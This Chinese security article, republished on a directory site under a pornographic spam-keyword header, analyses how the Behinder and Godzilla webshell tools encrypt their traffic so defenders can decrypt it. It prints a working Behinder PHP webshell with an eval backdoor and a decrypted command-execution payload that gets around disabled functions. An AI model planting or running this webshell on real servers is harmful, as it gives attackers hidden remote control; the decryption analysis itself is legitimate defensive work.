日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

<code id="eqoug"></code>

<li id="eqoug"></li>

公告：魔扣目錄網為廣大站長提供免費收錄網站服務，提交前請做好本站友鏈：【網站目錄：http://www.ylptlb.cn 】，免友鏈快審服務（50元/站），

點擊這里在線咨詢客服

網站：51998
待審：31
小程序：12
文章：1030137
會員：747

首頁 > 新聞資訊 > IT業界 >正文

流量加密怎么辦？主流webshell管理工具流量解密分析

發布時間：2023-07-02 23:58:06 作者：網友整理

一、引言

某行動在即，本文基于冰蝎Behinder_v3.0.11和哥斯拉v4.00-godzilla，對它們的加解密方式進行識別和分析【附簡易解密腳本】，希望能在行動中助大家一臂之力。

二、冰蝎

冰蝎加密機制，通過閱讀代碼可知分為四類，即jsp，php，aspx，asp。

流量加密怎么辦？主流webshell管理工具流量解密分析

2.1 PHP

閱讀php木馬腳本：

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //該密鑰為連接密碼32位md5值的前16位，默認連接密碼rebeyond
  $_SESSION['k']=$key;
  session_write_close();
  $post=file_get_contents("php://input");
  if(!extension_loaded('openssl'))
  {
    $t="base64_"."decode";
    $post=$t($post."");
    
    for($i=0;$i<strlen($post);$i++) {
           $post[$i] = $post[$i]^$key[$i+1&15]; 
          }
            echo "no openssl";
  }
  else
  {
    $post=openssl_decrypt($post, "AES128", $key);
  }
  // echo $post;
  // echo "------------------";
    $arr=explode('|',$post);
    // echo $arr[1];
    // echo "------------------";
    $func=$arr[0];
    $params=$arr[1];
  class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

閱讀代碼可知，在有openssl的情況下冰蝎會使用openssl進行aes128解密，在沒有的情況下使用異或解密。

以一次cmd執行為例進行分析為例：

流量加密怎么辦？主流webshell管理工具流量解密分析

抓取請求進行AES128解密,得到如下代碼，與冰蝎源碼中的php payload互相對應：

@error_reporting(0);


function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function main($cmd,$path)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time', 0);
    $result = array();
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
        $PadtJn = explode(',', $PadtJn);
        $PadtJn = array_map('trim', $PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1n";
    }
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
        $handle = proc_open($c, array(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
        $kWJW = array();
        exec($c, $kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
        $fp = popen($c, 'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp, 1024);
            }
        }
        @pclose($fp);
    } else {
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;
        
    }
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode(getSafeStr($kWJW));
    echo encrypt(json_encode($result),  $_SESSION['k']);
}


function encrypt($data,$key)
{
  if(!extension_loaded('openssl'))
      {
        for($i=0;$i<strlen($data);$i++) {
           $data[$i] = $data[$i]^$key[$i+1&15]; 
          }
      return $data;
      }
    else
      {
        return openssl_encrypt($data, "AES128", $key);
      }
}$cmd="Y2QgL2QgIkU6XHBocHN0dWR5X3Byb1xXV1dcIiZkaXI=";$cmd=base64_decode($cmd);$path="RTovcGhwc3R1ZHlfcHJvL1dXVy8=";$path=base64_decode($path);
main($cmd,$path);

其中cmd參數即為所傳輸命令的base64編碼，并且可以得出響應體的加密與請求所用方式一致。

對響應體解密，可以得到如下信息：

流量加密怎么辦？主流webshell管理工具流量解密分析

其中，status與msg均為base64編碼，解開即可得到明文。

其他操作類型同理，均可解密為明文。

2.2 ASP

由冰蝎代碼可知asp使用xor加密

public static byte[] EncryptForAsp(byte[] bs, String key) throws Exception { 
        for(int i = 0; i < bs.length; ++i) { 
            bs[i] ^= key.getBytes()[i + 1 & 15]; 
        } 
 
        return bs; 
    }

結合asp腳本，分析的出asp請求和響應使用xor加密可以解析；

響應格式與php相同，status與msg均為base64編碼，解開即可得到明文。

流量加密怎么辦？主流webshell管理工具流量解密分析

2.3 CSharp

通過閱讀源碼可知，aspx使用的AES/CBC/PKCS5Padding，iv為key。

public static byte[] EncryptForCSharp(byte[] bs, String key) throws Exception { 
        byte[] raw = key.getBytes("utf-8"); 
        IvParameterSpec iv = new IvParameterSpec(raw); 
        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES"); 
        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding"); 
        cipher.init(1, skeySpec, iv); 
        byte[] encrypted = cipher.doFinal(bs); 
        return encrypted; 
    }

由于aspx的payload為dll文件，請求解密后為pe文件格式，可將文件轉存后用ida進行分析。

響應解密出來同樣是一個json：

流量加密怎么辦？主流webshell管理工具流量解密分析

對應信息也需要base64解碼為明文。

2.4 JAVA

冰蝎對jsp，jspx系列的處理是一致的。閱讀源碼可知，使用的是AES/ECB/PKCS5Padding.

public static byte[] DecryptForJava(byte[] bs, String key) throws Exception { 
        byte[] raw = key.getBytes("utf-8"); 
        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES"); 
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding"); 
        cipher.init(2, skeySpec); 
        byte[] decrypted = cipher.doFinal(bs); 
        return decrypted; 
    }

由于傳輸的文件為java的class文件，請求解密后為class文件格式，可將文件轉存后用idea進行分析。

響應解密出來同樣是json，對應信息也需要base64節碼為明文。

流量加密怎么辦？主流webshell管理工具流量解密分析

三、哥斯拉

相比于冰蝎，哥斯拉可選的加密方式就有很多種了，每一種都對應著一個server腳本。

流量加密怎么辦？主流webshell管理工具流量解密分析

且除了xor的加密方式，響應都會經過findstr函數，首尾各去掉的16位

流量加密怎么辦？主流webshell管理工具流量解密分析

流量加密怎么辦？主流webshell管理工具流量解密分析

3.1 phpXor

3.1.1 PhpEvalXor

分析代碼及流量，請求為明文可執行代碼+加密數據，響應為去掉首尾后，先解base64然后解xor。

關鍵代碼如下:

public byte[] decode(byte[] data) {
    if (data != null && data.length > 0) {
        try {
            return this.D(this.findStr(data));
        } catch (Exception var3) {
            Log.error(var3);
            return null;
        }
    } else {
        return data;
    }
}
public byte[] D(String data) {
    byte[] cs = functions.base64Decode(data);
    int len = cs.length;


    for(int i = 0; i < len; ++i) {
        cs[i] ^= this.key[i + 1 & 15];
    }


    return cs;
}

3.1.2 PhpXor

分析代碼及流量，請求位xor+base64，響應為去掉首尾后，xor+base64

關鍵代碼如下:

public byte[] encode(byte[] data) {
    try {
        return this.E(data);
    } catch (Exception var3) {
        Log.error(var3);
        return null;
    }
}


public byte[] decode(byte[] data) {
    if (data != null && data.length > 0) {
        try {
            return this.D(this.findStr(data));
        } catch (Exception var3) {
            Log.error(var3);
            return null;
        }
    } else {
        return data;
    }
}


public byte[] E(byte[] cs) {
    int len = cs.length;


    for(int i = 0; i < len; ++i) {
        cs[i] ^= this.key[i + 1 & 15];
    }


    return (this.pass + "=" + URLEncoder.encode(functions.base64EncodeToString(cs))).getBytes();
}


public byte[] D(String data) {
    byte[] cs = functions.base64Decode(data);
    int len = cs.length;


    for(int i = 0; i < len; ++i) {
        cs[i] ^= this.key[i + 1 & 15];
    }


    return cs;
}

3.1.3 PhpXorRaw

分析代碼及流量，請求為xor，響應為xor

關鍵代碼如下:

public byte[] encode(byte[] data) {
    try {
        return this.E(data);
    } catch (Exception var3) {
        Log.error(var3);
        return null;
    }
}


public byte[] decode(byte[] data) {
    if (data != null && data.length > 0) {
        try {
            return this.D(data);
        } catch (Exception var3) {
            Log.error(var3);
            return null;
        }
    } else {
        return data;
    }
}


public byte[] E(byte[] cs) {
    int len = cs.length;


    for(int i = 0; i < len; ++i) {
        cs[i] ^= this.key[i + 1 & 15];
    }


    return cs;
}


public byte[] D(byte[] cs) {
    int len = cs.length;


    for(int i = 0; i < len; ++i) {
        cs[i] ^= this.key[i + 1 & 15];
    }


    return cs;
}

3.2 JavaAes

3.2.1 JavaAesBase64

請求響應均為為aes+base64，key就是參數key，模式為ECB

關鍵代碼如下：

this.encodeCipher = Cipher.getInstance("AES");
this.decodeCipher = Cipher.getInstance("AES");
this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"));
this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"));




public byte[] encode(byte[] data) {
    try {
        return (this.pass + "=" + URLEncoder.encode(functions.base64EncodeToString(this.encodeCipher.doFinal(data)))).getBytes();
    } catch (Exception var3) {
        Log.error(var3);
        return null;
    }
}


public byte[] decode(byte[] data) {
    try {
        data = functions.base64Decode(this.findStr(data));
        return this.decodeCipher.doFinal(data);
    } catch (Exception var3) {
        Log.error(var3);
        return null;
    }
}

3.2.2 JavaAesRaw

請求響應均為為aes，key就是參數key，模式為ECB

關鍵代碼如下:

this.encodeCipher = Cipher.getInstance("AES");
this.decodeCipher = Cipher.getInstance("AES");
this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"));
this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"));
public byte[] encode(byte[] data) {
    try {
        return this.encodeCipher.doFinal(data);
    } catch (Exception var3) {
        Log.error(var3);
        return null;
    }
}


public byte[] decode(byte[] data) {
    try {
        return this.decodeCipher.doFinal(data);
    } catch (Exception var3) {
        Log.error(var3);
        return null;
    }
}

3.3 CShapAes

3.3.1 CShapAesBase64

請求響應均為為aes+base64，key就是參數key，iv也是參數key，模式為CBC

關鍵代碼如下：

this.encodeCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
this.decodeCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"), new IvParameterSpec(this.key.getBytes()));
this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"), new IvParameterSpec(this.key.getBytes()));


public byte[] encode(byte[] data) {
        try {
            return (this.pass + "=" + URLEncoder.encode(functions.base64Encode(this.encodeCipher.doFinal(data)))).getBytes();
        } catch (Exception var3) {
            Log.error(var3);
            return null;
        }
    }


public byte[] decode(byte[] data) {
    try {
        data = functions.base64Decode(this.findStr(data));
        return this.decodeCipher.doFinal(data);
    } catch (Exception var3) {
        Log.error(var3);
        return null;
    }
}

3.3.2 CShapAesRaw

請求響應均為為aes，key就是參數key，iv也是參數key，模式為CBC

關鍵代碼如下:

this.encodeCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
this.decodeCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"), new IvParameterSpec(this.key.getBytes()));
this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"), new IvParameterSpec(this.key.getBytes()));


public byte[] encode(byte[] data) {
    try {
        return this.encodeCipher.doFinal(data);
    } catch (Exception var3) {
        Log.error(var3);
        return null;
    }
}


public byte[] decode(byte[] data) {
    try {
        return this.decodeCipher.doFinal(data);
    } catch (Exception var3) {
        Log.error(var3);
        return null;
    }
}

3.3.3 CSharpEvalAesBase64

請求為明文可執行代碼+加密數據，請求響應為aes，key就是參數key，iv也是參數key，模式為CBC

關鍵代碼如下：

this.encodeCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
this.decodeCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"), new IvParameterSpec(this.key.getBytes()));
this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"), new IvParameterSpec(this.key.getBytes()));




public byte[] encode(byte[] data) {
    try {
        return (String.format("%s=%s&", this.pass, this.evalContent) + this.shell.getSecretKey() + "=" + URLEncoder.encode(functions.base64Encode(this.encodeCipher.doFinal(data)))).getBytes();
    } catch (Exception var3) {
        Log.error(var3);
        return null;
    }
}


public byte[] decode(byte[] data) {
    try {
        data = functions.base64Decode(this.findStr(data));
        return this.decodeCipher.doFinal(data);
    } catch (Exception var3) {
        Log.error(var3);
        return null;
    }
}

3.3.4 CShapAsmxAesBase64

asmx加密方式與CShapAesBase64一致，只是傳參變成xml格式

流量加密怎么辦？主流webshell管理工具流量解密分析

3.4 aspXor

asp系列的有一個改變就是非raw的首位16位填充變為了6位

流量加密怎么辦？主流webshell管理工具流量解密分析

3.4.1 AspRaw

抓包可以看到通信是明文的不需要解密

流量加密怎么辦？主流webshell管理工具流量解密分析

   public byte[] encode(byte[] data) {
        try {
            return data;
        } catch (Exception var3) {
            Log.error(var3);
            return null;
        }
    }


    public byte[] decode(byte[] data) {
        if (data != null && data.length > 0) {
            try {
                return data;
            } catch (Exception var3) {
                Log.error(var3);
                return null;
            }
        } else {
            return data;
        }
    }

3.4.2 AspBase64

加密方式為base64，響應首尾填充6位

流量加密怎么辦？主流webshell管理工具流量解密分析

 public byte[] encode(byte[] data) {
        try {
            return this.E(data);
        } catch (Exception var3) {
            Log.error(var3);
            return null;
        }
    }


    public byte[] decode(byte[] data) {
        if (data != null && data.length > 0) {
            try {
                return this.D(this.findStr(data));
            } catch (Exception var3) {
                Log.error(var3);
                return null;
            }
        } else {
            return data;
        }
    }
    
        public byte[] E(byte[] cs) {
        return (this.pass + "=" + URLEncoder.encode(functions.base64EncodeToString(cs))).getBytes();
    }


    public byte[] D(String data) {
        byte[] cs = functions.base64Decode(data);
        return cs;
    }

3.4.3 AspEvalBase64

請求為明文轉送一部分代碼，并將執行數據作為代碼中一個變量傳輸，響應為base64首尾填充6位

public byte[] E(byte[] cs) {
        return (this.pass + "=" + this.chopperRequest + "&" + this.shell.getSecretKey() + "=" + URLEncoder.encode(functions.base64EncodeToString(cs))).getBytes();
    }


    public byte[] D(String data) {
        byte[] cs = functions.base64Decode(data);
        return cs;
    }

3.4.4 AspXorBae64

加密方式為base64+xor

響應首尾填充6位

public byte[] encode(byte[] data) {
        try {
            return this.E(data);
        } catch (Exception var3) {
            Log.error(var3);
            return null;
        }
    }


    public byte[] decode(byte[] data) {
        if (data != null && data.length > 0) {
            try {
                return this.D(this.findStr(data));
            } catch (Exception var3) {
                Log.error(var3);
                return null;
            }
        } else {
            return data;
        }
    }




    protected void decryption(byte[] data, byte[] key) {
        int len = data.length;
        int keyLen = key.length;
        int index = false;


        for(int i = 1; i <= len; ++i) {
            int index = i - 1;
            data[index] ^= key[i % keyLen];
        }


    }


    public byte[] E(byte[] cs) {
        this.decryption(cs, this.key);
        return (this.pass + "=" + URLEncoder.encode(functions.base64EncodeToString(cs))).getBytes();
    }


    public byte[] D(String data) {
        byte[] cs = functions.base64Decode(data);
        this.decryption(cs, this.key);
        return cs;
    }

3.4.5 AspXorRaw

加密方式為xor

其中，super.decryption即為xor函數

public byte[] encode(byte[] data) { 
        try { 
            super.decryption(data, this.key); 
            return data; 
        } catch (Exception var3) { 
            Log.error(var3); 
            return null; 
        } 
    } 
 
    public byte[] decode(byte[] data) { 
        if (data != null && data.length > 0) { 
            try { 
                super.decryption(data, this.key); 
                return data; 
            } catch (Exception var3) { 
                Log.error(var3); 
                return null; 
            } 
        } else { 
            return data; 
        } 
    }

四、解密腳本

公眾號回復“webshell”獲取解密腳本鏈接

使用方法：

按照加密類型、key和pass，初始化類。然后輸入字節流形式的請求/響應體，調用相應的加/解密函數即可。

如下例子：

```Python/ target=_blank class=infotextkey>Python
decrypter = PHP_XOR_BASE64(pass_='pass', key='3c6e0b8a9c15224a')
data = decrypter.decrypt_req_payload(b'pass=DlMRWA1cL1gOVDc2MjRhRwZFEQ==')
print(data)
data = decrypter.decrypt_res_payload(b'72a9c691ccdaab98fL1tMGI4YTljO/79NDQm7r9PZzBiOA==b4c4e1f6ddd2a488')
print(data)
```

分享到：

標簽：加密流量

網友整理

注冊時間：

網站：5 個小程序：0 個文章：12 篇

51998
網站
12
小程序
1030137
文章
747
會員

趕快注冊賬號，推廣您的網站吧！

文章分類

熱門網站

各百科-專業百科問答知識名網站 m.geelcn.com
免費軟件,綠色軟件園,手機軟件下載,熱門游戲下載中心-中當網 m.deelcn.com
魔扣科技 www.ylptlb.cn
體育新聞_國際體育資訊_全球體育賽事-中名網 www.feelcn.com/tiyu/tiyuxinwen/
食品安全_健康飲食_舌尖上的安全-中名網 www.feelcn.com/shenghuo/shipinanquan/
中合網 www.heelcn.com
中當網 www.deelcn.com
魔扣網站維護代運營 www.ylptlb.cn/tg
中合網-健康養生知識科普名站 m.heelcn.com
各百科 www.geelcn.com

最新入駐小程序

數獨大挑戰

數獨大挑戰2018-06-03

數獨一種數學游戲，玩家需要根據9

答題星

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試

全階人生考試2018-06-03

各種考試題，題庫，初中，高中，大學四六

運動步數有氧達人

運動步數有氧達人2018-06-03

記錄運動步數，積累氧氣值。還可偷

每日養生app

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定

熱門文章